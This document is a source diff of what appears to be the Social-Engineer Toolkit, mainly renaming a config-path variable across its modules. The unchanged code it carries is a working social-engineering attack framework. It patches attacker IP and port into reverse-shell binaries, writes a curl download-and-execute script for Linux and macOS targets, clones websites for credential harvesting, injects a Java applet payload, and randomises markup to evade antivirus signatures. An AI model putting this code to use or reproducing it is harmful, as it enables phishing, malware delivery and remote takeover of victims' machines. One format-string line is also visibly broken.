filewrite.write(data.replace(str(webserver_count), webserver + "\x00", 1))
|
||||
filewrite.close()
|
||||
fileopen = open(setdir + "/msf.exe", "rb")
|
||||
fileopen = open(userconfigpath + "msf.exe", "rb")
|
||||
data = fileopen.read()
|
||||
filewrite = open(setdir + "/msf.exe", "wb")
|
||||
filewrite = open(userconfigpath + "msf.exe", "wb")
|
||||
filewrite.write(data.replace(str(ipaddr_count), ipaddr + "\x00", 1))
|
||||
filewrite.close()
|
||||
|
||||
|
@ -135,14 +135,14 @@ if payload_selection == "SETSHELL":
|
|||
if payload_selection == "RATTE":
|
||||
fileopen = open("src/payloads/ratte/ratte.binary", "rb")
|
||||
data = fileopen.read()
|
||||
filewrite = open(setdir + "/msf.exe", "wb")
|
||||
filewrite = open(userconfigpath + "msf.exe", "wb")
|
||||
host = int(len(ipaddr) + 1) * "X"
|
||||
rPort = int(len(str(port)) + 1) * "Y"
|
||||
filewrite.write(data.replace(str(host), ipaddr + "\x00", 1))
|
||||
filewrite.close()
|
||||
fileopen = open(setdir + "/msf.exe", "rb")
|
||||
fileopen = open(userconfigpath + "msf.exe", "rb")
|
||||
data = fileopen.read()
|
||||
filewrite = open(setdir + "/msf.exe", "wb")
|
||||
filewrite = open(userconfigpath + "msf.exe", "wb")
|
||||
filewrite.write(data.replace(str(rPort), str(port) + "\x00", 1))
|
||||
filewrite.close()
|
||||
|
||||
|
@ -152,22 +152,22 @@ if upx_encode == "ON" or upx_encode == "on":
|
|||
# core upx
|
||||
pass
|
||||
|
||||
if os.path.isfile(setdir + "/web_clone/msf.exe"):
|
||||
os.remove(setdir + "/web_clone/msf.exe")
|
||||
if os.path.isfile(setdir + "/msf.exe"):
|
||||
shutil.copyfile(setdir + "/msf.exe", setdir + "/web_clone/msf.exe")
|
||||
if os.path.isfile(userconfigpath + "web_clone/msf.exe"):
|
||||
os.remove(userconfigpath + "web_clone/msf.exe")
|
||||
if os.path.isfile(userconfigpath + "msf.exe"):
|
||||
shutil.copyfile(userconfigpath + "msf.exe", userconfigpath + "web_clone/msf.exe")
|
||||
|
||||
if payload_selection == "SETSHELL":
|
||||
if os.path.isfile(setdir + "/web_clone/x"):
|
||||
os.remove(setdir + "/web_clone/x")
|
||||
if os.path.isfile(userconfigpath + "web_clone/x"):
|
||||
os.remove(userconfigpath + "web_clone/x")
|
||||
shutil.copyfile("%s/src/payloads/set_payloads/shell.windows" %
|
||||
(definepath), setdir + "/web_clone/x")
|
||||
(definepath), userconfigpath + "web_clone/x")
|
||||
|
||||
# if we are targetting nix
|
||||
if posix == True:
|
||||
print_info(
|
||||
"Targetting of OSX/Linux (POSIX-based) as well. Prepping posix payload...")
|
||||
filewrite = open(setdir + "/web_clone/mac.bin", "w")
|
||||
filewrite = open(userconfigpath + "web_clone/mac.bin", "w")
|
||||
payload_flags = webserver.split(" ")
|
||||
# grab osx binary name
|
||||
osx_name = generate_random_string(10, 10)
|
||||
|
@ -255,21 +255,21 @@ if posix == True:
|
|||
linux_name = generate_random_string(10, 10)
|
||||
downloader = "#!/usr/bin/sh\ncurl -C - -O http://%s/%s\nchmod +x %s\n./%s %s %s &" % (
|
||||
payload_flags[1], linux_name, linux_name, linux_name, payload_flags[1], payload_flags[2])
|
||||
filewrite = open(setdir + "/web_clone/nix.bin", "w")
|
||||
filewrite = open(userconfigpath + "web_clone/nix.bin", "w")
|
||||
filewrite.write(downloader)
|
||||
filewrite.close()
|
||||
shutil.copyfile(definepath + "/src/payloads/set_payloads/shell.osx",
|
||||
setdir + "/web_clone/%s" % (osx_name))
|
||||
userconfigpath + "web_clone/%s" % (osx_name))
|
||||
shutil.copyfile(definepath + "/src/payloads/set_payloads/shell.linux",
|
||||
setdir + "/web_clone/%s" % (linux_name))
|
||||
userconfigpath + "web_clone/%s" % (linux_name))
|
||||
|
||||
# copy over the downloader scripts
|
||||
osx_down = check_options("MAC.BIN=")
|
||||
lin_down = check_options("NIX.BIN=")
|
||||
shutil.copyfile(setdir + "/web_clone/nix.bin",
|
||||
setdir + "/web_clone/%s" % (lin_down))
|
||||
shutil.copyfile(setdir + "/web_clone/mac.bin",
|
||||
setdir + "/web_clone/%s" % (osx_down))
|
||||
shutil.copyfile(userconfigpath + "web_clone/nix.bin",
|
||||
userconfigpath + "web_clone/%s" % (lin_down))
|
||||
shutil.copyfile(userconfigpath + "web_clone/mac.bin",
|
||||
userconfigpath + "web_clone/%s" % (osx_down))
|
||||
|
||||
# check to see if we are using a staged approach or direct shell
|
||||
stager = check_config("SET_SHELL_STAGER=").lower()
|
||||
|
@ -277,11 +277,11 @@ if stager == "off" or payload_selection == "SETSHELL_HTTP":
|
|||
# only trigger if we are using the SETSHELL
|
||||
if payload_selection == "SETSHELL" or payload_selection == "SETSHELL_HTTP":
|
||||
# ensure that index.html is really there
|
||||
if os.path.isfile(setdir + "/web_clone/index.html"):
|
||||
if os.path.isfile(userconfigpath + "web_clone/index.html"):
|
||||
print_status(
|
||||
"Stager turned off, prepping direct download payload...")
|
||||
fileopen = open(setdir + "/web_clone/index.html", "r")
|
||||
filewrite = open(setdir + "/web_clone/index.html.3", "w")
|
||||
fileopen = open(userconfigpath + "web_clone/index.html", "r")
|
||||
filewrite = open(userconfigpath + "web_clone/index.html.3", "w")
|
||||
data = fileopen.read()
|
||||
# replace freehugs with ip and port
|
||||
data = data.replace("freehugs", reverse_connection)
|
||||
|
@ -293,22 +293,22 @@ if stager == "off" or payload_selection == "SETSHELL_HTTP":
|
|||
# be newer
|
||||
if payload_selection == "SETSHELL":
|
||||
try:
|
||||
if os.path.isfile(setdir + "/web_clone/index.html"):
|
||||
os.remove(setdir + "/web_clone/index.html")
|
||||
shutil.copyfile(setdir + "/web_clone/index.html.3",
|
||||
setdir + "/web_clone/index.html")
|
||||
if os.path.isfile(setdir + "/web_clone/index.html.3"):
|
||||
os.remove(setdir + "/web_clone/index.html.3")
|
||||
if os.path.isfile(setdir + "/web_clone/msf.exe"):
|
||||
os.remove(setdir + "/web_clone/msf.exe")
|
||||
shutil.copyfile(setdir + "/web_clone/x",
|
||||
setdir + "/web_clone/msf.exe")
|
||||
if os.path.isfile(userconfigpath + "web_clone/index.html"):
|
||||
os.remove(userconfigpath + "web_clone/index.html")
|
||||
shutil.copyfile(userconfigpath + "web_clone/index.html.3",
|
||||
userconfigpath + "web_clone/index.html")
|
||||
if os.path.isfile(userconfigpath + "web_clone/index.html.3"):
|
||||
os.remove(userconfigpath + "web_clone/index.html.3")
|
||||
if os.path.isfile(userconfigpath + "web_clone/msf.exe"):
|
||||
os.remove(userconfigpath + "web_clone/msf.exe")
|
||||
shutil.copyfile(userconfigpath + "web_clone/x",
|
||||
userconfigpath + "web_clone/msf.exe")
|
||||
shutil.copyfile(
|
||||
setdir + "/web_clone/msf.exe", setdir + "/msf.exe")
|
||||
if os.path.isfile(setdir + "/msf.exe"):
|
||||
os.remove(setdir + "/msf.exe")
|
||||
userconfigpath + "web_clone/msf.exe", userconfigpath + "msf.exe")
|
||||
if os.path.isfile(userconfigpath + "msf.exe"):
|
||||
os.remove(userconfigpath + "msf.exe")
|
||||
shutil.copyfile(
|
||||
setdir + "/web_clone/msf.exe", setdir + "/msf.exe")
|
||||
userconfigpath + "web_clone/msf.exe", userconfigpath + "msf.exe")
|
||||
|
||||
# catch errors, will convert to log later
|
||||
except Exception as error:
|
||||
|
@ -317,22 +317,22 @@ if stager == "off" or payload_selection == "SETSHELL_HTTP":
|
|||
# if we are using the HTTP reverse shell then lets use this
|
||||
if payload_selection == "SETSHELL_HTTP":
|
||||
try:
|
||||
if os.path.isfile(setdir + "/web_clone/index.html"):
|
||||
os.remove(setdir + "/web_clone/index.html")
|
||||
shutil.copyfile(setdir + "/web_clone/index.html.3",
|
||||
setdir + "/web_clone/index.html")
|
||||
if os.path.isfile(setdir + "/web_clone/index.html.3"):
|
||||
os.remove(setdir + "/web_clone/index.html.3")
|
||||
if os.path.isfile(setdir + "/web_clone/msf.exe"):
|
||||
os.remove(setdir + "/web_clone/msf.exe")
|
||||
if os.path.isfile(userconfigpath + "web_clone/index.html"):
|
||||
os.remove(userconfigpath + "web_clone/index.html")
|
||||
shutil.copyfile(userconfigpath + "web_clone/index.html.3",
|
||||
userconfigpath + "web_clone/index.html")
|
||||
if os.path.isfile(userconfigpath + "web_clone/index.html.3"):
|
||||
os.remove(userconfigpath + "web_clone/index.html.3")
|
||||
if os.path.isfile(userconfigpath + "web_clone/msf.exe"):
|
||||
os.remove(userconfigpath + "web_clone/msf.exe")
|
||||
shutil.copyfile(
|
||||
"src/payloads/set_payloads/http_shell.binary", setdir + "/web_clone/msf.exe")
|
||||
"src/payloads/set_payloads/http_shell.binary", userconfigpath + "web_clone/msf.exe")
|
||||
shutil.copyfile(
|
||||
setdir + "/web_clone/msf.exe", setdir + "/msf.exe")
|
||||
if os.path.isfile(setdir + "/msf.exe"):
|
||||
os.remove(setdir + "/msf.exe")
|
||||
userconfigpath + "web_clone/msf.exe", userconfigpath + "msf.exe")
|
||||
if os.path.isfile(userconfigpath + "msf.exe"):
|
||||
os.remove(userconfigpath + "msf.exe")
|
||||
shutil.copyfile(
|
||||
setdir + "/web_clone/msf.exe", setdir + "/msf.exe")
|
||||
userconfigpath + "web_clone/msf.exe", userconfigpath + "msf.exe")
|
||||
|
||||
# catch errors, will convert to log later
|
||||
except Exception as error:
|
||||
|
|
|
@ -205,7 +205,7 @@ try:
|
|||
|
||||
try:
|
||||
# write our attack vector to file to be called later
|
||||
filewrite = open(setdir + "/attack_vector", "w")
|
||||
filewrite = open(userconfigpath + "attack_vector", "w")
|
||||
|
||||
# webjacking and web templates are not allowed
|
||||
if attack_vector == "5" and choice3 == "1":
|
||||
|
@ -329,7 +329,7 @@ try:
|
|||
["2"], "IP address to SET web server (this could be your external IP or hostname)"))
|
||||
|
||||
filewrite2 = open(
|
||||
setdir + "/interface", "w")
|
||||
userconfigpath + "interface", "w")
|
||||
filewrite2.write(
|
||||
ipquestion)
|
||||
filewrite2.close()
|
||||
|
@ -407,8 +407,8 @@ try:
|
|||
sys.path.append(definepath + "/src/html/")
|
||||
|
||||
# clean up stale file
|
||||
if os.path.isfile(setdir + "/cloner.failed"):
|
||||
os.remove(setdir + "/cloner.failed")
|
||||
if os.path.isfile(userconfigpath + "cloner.failed"):
|
||||
os.remove(userconfigpath + "cloner.failed")
|
||||
|
||||
site_cloned = True
|
||||
|
||||
|
@ -429,7 +429,7 @@ try:
|
|||
except:
|
||||
import src.core.payloadgen.create_payloads
|
||||
|
||||
if os.path.isfile(setdir + "/cloner.failed"):
|
||||
if os.path.isfile(userconfigpath + "cloner.failed"):
|
||||
site_cloned = False
|
||||
|
||||
if site_cloned == True:
|
||||
|
@ -506,9 +506,9 @@ try:
|
|||
definepath = os.getcwd()
|
||||
sys.path.append(
|
||||
definepath + "/src/webattack/web_clone/")
|
||||
if os.path.isfile(setdir + "/site.template"):
|
||||
os.remove(setdir + "/site.template")
|
||||
filewrite = open(setdir + "/site.template", "w")
|
||||
if os.path.isfile(userconfigpath + "site.template"):
|
||||
os.remove(userconfigpath + "site.template")
|
||||
filewrite = open(userconfigpath + "site.template", "w")
|
||||
filewrite.write("TEMPLATE=CUSTOM")
|
||||
print_info("SET supports both HTTP and HTTPS")
|
||||
# specify the site to clone
|
||||
|
@ -574,7 +574,7 @@ try:
|
|||
except:
|
||||
import src.webattack.web_clone.cloner
|
||||
|
||||
if os.path.isfile(setdir + "/cloner.failed"):
|
||||
if os.path.isfile(userconfigpath + "cloner.failed"):
|
||||
site_cloned = False
|
||||
|
||||
if site_cloned == True:
|
||||
|
@ -652,13 +652,13 @@ try:
|
|||
|
||||
sys.path.append(
|
||||
definepath + "/src/webattack/web_clone/")
|
||||
if os.path.isfile(setdir + "/site.template"):
|
||||
os.remove(setdir + "/site.template")
|
||||
filewrite = open(setdir + "/site.template", "w")
|
||||
if os.path.isfile(userconfigpath + "site.template"):
|
||||
os.remove(userconfigpath + "site.template")
|
||||
filewrite = open(userconfigpath + "site.template", "w")
|
||||
filewrite.write("TEMPLATE=SELF")
|
||||
# specify the site to clone
|
||||
if not os.path.isdir(setdir + "/web_clone"):
|
||||
os.makedirs(setdir + "/web_clone")
|
||||
if not os.path.isdir(userconfigpath + "web_clone"):
|
||||
os.makedirs(userconfigpath + "web_clone")
|
||||
print_warning(
|
||||
"Example: /home/website/ (make sure you end with /)")
|
||||
print_warning(
|
||||
|
@ -671,11 +671,11 @@ try:
|
|||
if not os.path.isfile(URL + "index.html"):
|
||||
if os.path.isfile(URL):
|
||||
shutil.copyfile(
|
||||
"%s" % (URL), setdir + "/web_clone/index.html")
|
||||
"%s" % (URL), userconfigpath + "web_clone/index.html")
|
||||
if not os.path.isfile(URL):
|
||||
if URL.endswith("index.html"):
|
||||
shutil.copyfile(
|
||||
URL, "%s/web_clone/index.html" % (setdir))
|
||||
URL, "%s/web_clone/index.html" % (userconfigpath))
|
||||
else:
|
||||
print_error("ERROR:index.html not found!!")
|
||||
print_error(
|
||||
|
@ -690,11 +690,11 @@ try:
|
|||
choice = raw_input(
|
||||
"\n1. Copy just the index.html\n2. Copy the entire folder\n\nEnter choice [1/2]: ")
|
||||
if choice == "1" or choice == "":
|
||||
if os.path.isfile("%s/web_clone/index.html" % (setdir)):
|
||||
if os.path.isfile("%s/web_clone/index.html" % (userconfigpath)):
|
||||
os.remove(
|
||||
"%s/web_clone/index.html" % (setdir))
|
||||
"%s/web_clone/index.html" % (userconfigpath))
|
||||
shutil.copyfile(
|
||||
URL + "index.html", "%s/web_clone/" % (setdir))
|
||||
URL + "index.html", "%s/web_clone/" % (userconfigpath))
|
||||
if choice == "2":
|
||||
if os.path.isdir(URL + "src/webattack"):
|
||||
print_error(
|
||||
|
@ -705,7 +705,7 @@ try:
|
|||
print_error(
|
||||
"You tried the same thing. Exiting now.")
|
||||
sys.exit()
|
||||
copyfolder(URL, "%s/web_clone/" % setdir)
|
||||
copyfolder(URL, "%s/web_clone/" % userconfigpath)
|
||||
|
||||
filewrite.write("\nURL=%s" % (URL))
|
||||
filewrite.close()
|
||||
|
@ -782,7 +782,7 @@ try:
|
|||
if not match:
|
||||
if not match1:
|
||||
URL = ("http://" + URL)
|
||||
filewrite = open(setdir + "/site.template", "w")
|
||||
filewrite = open(userconfigpath + "site.template", "w")
|
||||
filewrite.write("\nURL=%s" % (URL))
|
||||
filewrite.close()
|
||||
|
||||
|
@ -807,7 +807,7 @@ try:
|
|||
if not match:
|
||||
if not match1:
|
||||
URL = ("http://" + URL)
|
||||
filewrite = open(setdir + "/site.template", "w")
|
||||
filewrite = open(userconfigpath + "site.template", "w")
|
||||
filewrite.write("\nURL=%s" % (URL))
|
||||
filewrite.close()
|
||||
# start tabnabbing here
|
||||
|
@ -879,13 +879,13 @@ try:
|
|||
setprompt(["3"], "IP address for the reverse connection (payload)"))
|
||||
update_options("IPADDR=" + ipaddr)
|
||||
|
||||
filewrite1 = open(setdir + "/payloadgen", "w")
|
||||
filewrite1 = open(userconfigpath + "payloadgen", "w")
|
||||
filewrite1.write("payloadgen=solo")
|
||||
filewrite1.close()
|
||||
|
||||
# if choice is file-format
|
||||
if infectious_menu_choice == "1":
|
||||
filewrite = open(setdir + "/fileformat.file", "w")
|
||||
filewrite = open(userconfigpath + "fileformat.file", "w")
|
||||
filewrite.write("fileformat=on")
|
||||
filewrite.close()
|
||||
sys.path.append(definepath + "/src/core/msf_attacks/")
|
||||
|
@ -923,8 +923,8 @@ try:
|
|||
# try: import src.core.payloadgen.solo
|
||||
# except: module_reload(src.core.payloadgen.solo)
|
||||
# if the set payload is there
|
||||
if os.path.isfile(setdir + "/msf.exe"):
|
||||
shutil.copyfile(setdir + "/msf.exe", "payload.exe")
|
||||
if os.path.isfile(userconfigpath + "msf.exe"):
|
||||
shutil.copyfile(userconfigpath + "msf.exe", "payload.exe")
|
||||
return_continue()
|
||||
|
||||
# Main Menu choice 5: Mass Mailer Attack
|
||||
|
@ -953,7 +953,7 @@ try:
|
|||
|
||||
if teensy_menu_choice != "99":
|
||||
# set our teensy info file in program junk
|
||||
filewrite = open(setdir + "/teensy", "w")
|
||||
filewrite = open(userconfigpath + "teensy", "w")
|
||||
filewrite.write(teensy_menu_choice + "\n")
|
||||
if teensy_menu_choice != "3" and teensy_menu_choice != "7" and teensy_menu_choice != "8" and teensy_menu_choice != "9" and teensy_menu_choice != "10" and teensy_menu_choice != "11" and teensy_menu_choice != "12" and teensy_menu_choice != "13" and teensy_menu_choice != "14":
|
||||
yes_or_no = yesno_prompt(
|
||||
|
@ -972,10 +972,10 @@ try:
|
|||
if yes_or_no == "NO":
|
||||
filewrite.close()
|
||||
# need these default files for web server load
|
||||
filewrite = open(setdir + "/site.template", "w")
|
||||
filewrite = open(userconfigpath + "site.template", "w")
|
||||
filewrite.write("TEMPLATE=CUSTOM")
|
||||
filewrite.close()
|
||||
filewrite = open(setdir + "/attack_vector", "w")
|
||||
filewrite = open(userconfigpath + "attack_vector", "w")
|
||||
filewrite.write("hid")
|
||||
filewrite.close()
|
||||
# if we are doing binary2teensy
|
||||
|
@ -998,10 +998,10 @@ try:
|
|||
if teensy_menu_choice == "9":
|
||||
print_status(
|
||||
"Generating the SD2Teensy OSX ino file for you...")
|
||||
if not os.path.isdir(setdir + "/reports/osx_sd2teensy"):
|
||||
os.makedirs(setdir + "/reports/osx_sd2teensy")
|
||||
if not os.path.isdir(userconfigpath + "reports/osx_sd2teensy"):
|
||||
os.makedirs(userconfigpath + "reports/osx_sd2teensy")
|
||||
shutil.copyfile("src/teensy/osx_sd2teensy.ino",
|
||||
"%s/reports/osx_sd2teensy/osx_sd2teensy.ino" % (setdir))
|
||||
"%s/reports/osx_sd2teensy/osx_sd2teensy.ino" % (userconfigpath))
|
||||
print_status(
|
||||
"File has been exported to ~/.set/reports/osx_sd2teensy/osx_sd2teensy.ino")
|
||||
return_continue()
|
||||
|
@ -1010,12 +1010,12 @@ try:
|
|||
if teensy_menu_choice == "10":
|
||||
print_status(
|
||||
"Generating the Arduino sniffer and libraries ino..")
|
||||
if not os.path.isdir(setdir + "/reports/arduino_sniffer"):
|
||||
os.makedirs(setdir + "/reports/arduino_sniffer")
|
||||
if not os.path.isdir(userconfigpath + "reports/arduino_sniffer"):
|
||||
os.makedirs(userconfigpath + "reports/arduino_sniffer")
|
||||
shutil.copyfile("src/teensy/x10/x10_sniffer.ino",
|
||||
setdir + "/reports/arduino_sniffer/x10_sniffer.ino")
|
||||
userconfigpath + "reports/arduino_sniffer/x10_sniffer.ino")
|
||||
shutil.copyfile("src/teensy/x10/libraries.zip",
|
||||
setdir + "/reports/arduino_sniffer/libraries.zip")
|
||||
userconfigpath + "reports/arduino_sniffer/libraries.zip")
|
||||
print_status(
|
||||
"Arduino sniffer files and libraries exported to ~/.set/reports/arduino_sniffer")
|
||||
return_continue()
|
||||
|
@ -1024,12 +1024,12 @@ try:
|
|||
if teensy_menu_choice == "11":
|
||||
print_status(
|
||||
"Generating the Arduino jammer ino and libraries...")
|
||||
if not os.path.isdir(setdir + "/reports/arduino_jammer"):
|
||||
os.makedirs(setdir + "/reports/arduino_jammer")
|
||||
if not os.path.isdir(userconfigpath + "reports/arduino_jammer"):
|
||||
os.makedirs(userconfigpath + "reports/arduino_jammer")
|
||||
shutil.copyfile("src/teensy/x10/x10_blackout.ino",
|
||||
setdir + "/reports/arduino_jammer/x10_blackout.ino")
|
||||
userconfigpath + "reports/arduino_jammer/x10_blackout.ino")
|
||||
shutil.copyfile("src/teensy/x10/libraries.zip",
|
||||
setdir + "/reports/arduino_jammer/libraries.zip")
|
||||
userconfigpath + "reports/arduino_jammer/libraries.zip")
|
||||
print_status(
|
||||
"Arduino jammer files and libraries exported to ~/.set/reports/arduino_jammer")
|
||||
return_continue()
|
||||
|
@ -1164,8 +1164,8 @@ and send the QRCode via a mailer.
|
|||
"Enter the URL you want the QRCode to go to (99 to exit): ")
|
||||
if url != "99":
|
||||
# if the reports directory does not exist then create it
|
||||
if not os.path.isdir("%s/reports" % (setdir)):
|
||||
os.makedirs("%s/reports" % (setdir))
|
||||
if not os.path.isdir("%s/reports" % (userconfigpath)):
|
||||
os.makedirs("%s/reports" % (userconfigpath))
|
||||
gen_qrcode(url)
|
||||
return_continue()
|
||||
|
||||
|
|
|
@ -2025,7 +2025,7 @@ def input(string):
|
|||
|
||||
|
||||
def fetch_template():
|
||||
fileopen = open(setdir + "/site.template").readlines()
|
||||
fileopen = open(userconfigpath + "site.template").readlines()
|
||||
for line in fileopen:
|
||||
line = line.rstrip()
|
||||
match = re.search("URL=", line)
|
||||
|
|
|
@ -8,7 +8,7 @@ from src.core.setcore import *
|
|||
import subprocess
|
||||
import os
|
||||
definepath = os.getcwd()
|
||||
os.chdir(setdir)
|
||||
os.chdir(userconfigpath)
|
||||
# create the directories for us
|
||||
subprocess.Popen("mkdir CA;cd CA;mkdir newcerts private", shell=True).wait()
|
||||
# move into CA directory
|
||||
|
|
|
@ -240,7 +240,7 @@ def deploy_hex2binary(ipaddr, port, username, password):
|
|||
core.update_options("POWERSHELL_SOLO=ON")
|
||||
core.print_status("Prepping the payload for delivery and injecting alphanumeric shellcode...")
|
||||
|
||||
#with open(os.path.join(core.userconfigpath, "/payload_options.shellcode"), "w") as filewrite:
|
||||
#with open(os.path.join(core.userconfigpath, "payload_options.shellcode"), "w") as filewrite:
|
||||
# format needed for shellcode generation
|
||||
filewrite = file(core.userconfigpath + "payload_options.shellcode", "w")
|
||||
filewrite.write("windows/meterpreter/reverse_https {0},".format(port))
|
||||
|
|
|
@ -68,7 +68,7 @@ try:
|
|||
if port == "":
|
||||
port = "443"
|
||||
core.update_options("PORT={0}".format(port))
|
||||
with open(os.path.join(core.userconfigpath, "/payload_options.shellcode"), "w") as filewrite:
|
||||
with open(os.path.join(core.userconfigpath, "payload_options.shellcode"), "w") as filewrite:
|
||||
# format needed for shellcode generation
|
||||
filewrite.write("{0} {1},".format(payload, port))
|
||||
core.update_options("POWERSHELL_SOLO=ON")
|
||||
|
|
|
@ -29,8 +29,8 @@ if check_options("CUSTOM_EXE="):
|
|||
custom = 1
|
||||
if not "CMD/MULTI" in check_options("CUSTOM_EXE="):
|
||||
# here we need to modify the java applet to recognize custom attribute
|
||||
fileopen3 = fileopen = open("%s/web_clone/index.html" % (setdir), "r")
|
||||
filewrite = open("%s/web_clone/index.html.new" % (setdir), "w")
|
||||
fileopen3 = fileopen = open("%s/web_clone/index.html" % (userconfigpath), "r")
|
||||
filewrite = open("%s/web_clone/index.html.new" % (userconfigpath), "w")
|
||||
data = fileopen3.read()
|
||||
|
||||
# we randomize param name so static sigs cant be used
|
||||
|
@ -39,7 +39,7 @@ if check_options("CUSTOM_EXE="):
|
|||
'param name="8" value="%s"' % (goat_random))
|
||||
filewrite.write(data)
|
||||
filewrite.close()
|
||||
subprocess.Popen("mv %s/web_clone/index.html.new %s/web_clone/index.html" % (setdir, setdir), shell=True).wait()
|
||||
subprocess.Popen("mv %s/web_clone/index.html.new %s/web_clone/index.html" % (userconfigpath, userconfigpath), shell=True).wait()
|
||||
|
||||
print_status("Note that since you are using a custom payload, you will need to create your OWN listener.")
|
||||
print_status("SET has no idea what type of payload you are using, so you will need to set this up manually.")
|
||||
|
@ -68,8 +68,8 @@ msf_path = ""
|
|||
|
||||
# see if we are using setshell
|
||||
set_payload = ""
|
||||
if os.path.isfile(setdir + "/set.payload"):
|
||||
fileopen = open(setdir + "/set.payload", "r")
|
||||
if os.path.isfile(userconfigpath + "set.payload"):
|
||||
fileopen = open(userconfigpath + "set.payload", "r")
|
||||
for line in fileopen:
|
||||
set_payload = line.rstrip()
|
||||
|
||||
|
@ -97,8 +97,8 @@ def web_server_start():
|
|||
web_port = check_config("WEB_PORT=")
|
||||
|
||||
# see if exploit requires webdav
|
||||
if os.path.isfile(setdir + "/meta_config"):
|
||||
fileopen = open(setdir + "/meta_config", "r")
|
||||
if os.path.isfile(userconfigpath + "meta_config"):
|
||||
fileopen = open(userconfigpath + "meta_config", "r")
|
||||
for line in fileopen:
|
||||
line = line.rstrip()
|
||||
match = re.search("set SRVPORT 80", line)
|
||||
|
@ -114,8 +114,8 @@ def web_server_start():
|
|||
ipaddr = input("Enter your ipaddress: ")
|
||||
|
||||
# Grab custom or set defined
|
||||
if os.path.isfile(setdir + "/site.template"):
|
||||
fileopen = open(setdir + "/site.template", "r").readlines()
|
||||
if os.path.isfile(userconfigpath + "site.template"):
|
||||
fileopen = open(userconfigpath + "site.template", "r").readlines()
|
||||
for line in fileopen:
|
||||
line = line.rstrip()
|
||||
match = re.search("TEMPLATE=", line)
|
||||
|
@ -124,13 +124,13 @@ def web_server_start():
|
|||
template = line[1]
|
||||
|
||||
# grab web attack selection
|
||||
if os.path.isfile(setdir + "/attack_vector"):
|
||||
fileopen = open(setdir + "/attack_vector", "r").readlines()
|
||||
if os.path.isfile(userconfigpath + "attack_vector"):
|
||||
fileopen = open(userconfigpath + "attack_vector", "r").readlines()
|
||||
for line in fileopen:
|
||||
attack_vector = line.rstrip()
|
||||
|
||||
# if it doesn't exist just set a default template
|
||||
if not os.path.isfile(setdir + "/attack_vector"):
|
||||
if not os.path.isfile(userconfigpath + "attack_vector"):
|
||||
attack_vector = "nada"
|
||||
|
||||
# Sticking it to A/V below
|
||||
|
@ -145,14 +145,14 @@ def web_server_start():
|
|||
|
||||
# check multiattack flags here
|
||||
multiattack_harv = "off"
|
||||
if os.path.isfile(setdir + "/multi_harvester"):
|
||||
if os.path.isfile(userconfigpath + "multi_harvester"):
|
||||
multiattack_harv = "on"
|
||||
if os.path.isfile(setdir + "/multi_tabnabbing"):
|
||||
if os.path.isfile(userconfigpath + "multi_tabnabbing"):
|
||||
multiattack_harv = "on"
|
||||
|
||||
# open our config file that was specified in SET
|
||||
if os.path.isfile(setdir + "/site.template"):
|
||||
fileopen = open(setdir + "/site.template", "r").readlines()
|
||||
if os.path.isfile(userconfigpath + "site.template"):
|
||||
fileopen = open(userconfigpath + "site.template", "r").readlines()
|
||||
# start loop here
|
||||
for line in fileopen:
|
||||
line = line.rstrip()
|
||||
|
@ -164,7 +164,7 @@ def web_server_start():
|
|||
url = line[1].rstrip()
|
||||
|
||||
# if we didn't create template then do self
|
||||
if not os.path.isfile(setdir + "/site.template"):
|
||||
if not os.path.isfile(userconfigpath + "site.template"):
|
||||
template = "SELF"
|
||||
|
||||
# If SET is setting up the website for you, get the website ready for
|
||||
|
@ -224,38 +224,38 @@ def web_server_start():
|
|||
if attack_vector != 'hijacking':
|
||||
print(bcolors.YELLOW + "[*] Moving payload into cloned website." + bcolors.ENDC)
|
||||
# copy all the files needed
|
||||
if not os.path.isfile(setdir + "/" + applet_name):
|
||||
if not os.path.isfile(userconfigpath + "" + applet_name):
|
||||
shutil.copyfile("%s/src/html/Signed_Update.jar.orig" %
|
||||
(definepath), "%s/%s" % (setdir, applet_name))
|
||||
shutil.copyfile(setdir + "/%s" % (applet_name),
|
||||
"%s/web_clone/%s" % (setdir, applet_name))
|
||||
(definepath), "%s/%s" % (userconfigpath, applet_name))
|
||||
shutil.copyfile(userconfigpath + "%s" % (applet_name),
|
||||
"%s/web_clone/%s" % (userconfigpath, applet_name))
|
||||
if os.path.isfile("%s/src/html/nix.bin" % (definepath)):
|
||||
nix = check_options("NIX.BIN=")
|
||||
shutil.copyfile("%s/src/html/nix.bin" %
|
||||
(definepath), "%s/web_clone/%s" % (setdir, nix))
|
||||
(definepath), "%s/web_clone/%s" % (userconfigpath, nix))
|
||||
if os.path.isfile("%s/src/html/mac.bin" % (definepath)):
|
||||
mac = check_options("MAC.BIN=")
|
||||
shutil.copyfile("%s/src/html/mac.bin" % (definepath),
|
||||
"%s/web_clone/%s" % (setdir, definepath, mac))
|
||||
if os.path.isfile(setdir + "/msf.exe"):
|
||||
"%s/web_clone/%s" % (userconfigpath, definepath, mac))
|
||||
if os.path.isfile(userconfigpath + "msf.exe"):
|
||||
win = check_options("MSF.EXE=")
|
||||
shutil.copyfile(setdir + "/msf.exe",
|
||||
"%s/web_clone/%s" % (setdir, win))
|
||||
shutil.copyfile(userconfigpath + "msf.exe",
|
||||
"%s/web_clone/%s" % (userconfigpath, win))
|
||||
|
||||
# pull random name generation
|
||||
print_status(
|
||||
"The site has been moved. SET Web Server is now listening..")
|
||||
rand_gen = check_options("MSF_EXE=")
|
||||
if rand_gen != 0:
|
||||
if os.path.isfile(setdir + "/custom.exe"):
|
||||
shutil.copyfile(setdir + "/msf.exe",
|
||||
setdir + "/web_clone/msf.exe")
|
||||
if os.path.isfile(userconfigpath + "custom.exe"):
|
||||
shutil.copyfile(userconfigpath + "msf.exe",
|
||||
userconfigpath + "web_clone/msf.exe")
|
||||
print("\n[*] Website has been cloned and custom payload imported. Have someone browse your site now")
|
||||
shutil.copyfile(setdir + "/web_clone/msf.exe",
|
||||
setdir + "/web_clone/%s" % (rand_gen))
|
||||
shutil.copyfile(userconfigpath + "web_clone/msf.exe",
|
||||
userconfigpath + "web_clone/%s" % (rand_gen))
|
||||
|
||||
# if docbase exploit do some funky stuff to get it to work right
|
||||
if os.path.isfile(setdir + "/docbase.file"):
|
||||
if os.path.isfile(userconfigpath + "docbase.file"):
|
||||
docbase = (r"""<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
|
||||
"http://www.w3.org/TR/html4/frameset.dtd">
|
||||
<HTML>
|
||||
|
@ -267,11 +267,11 @@ def web_server_start():
|
|||
<FRAME name=docbase noresize borders=0 scrolling=no src="http://%s:8080">
|
||||
</FRAMESET>
|
||||
</HTML>""" % (ipaddr))
|
||||
if os.path.isfile(setdir + "/web_clone/site.html"):
|
||||
os.remove(setdir + "/web_clone/site.html")
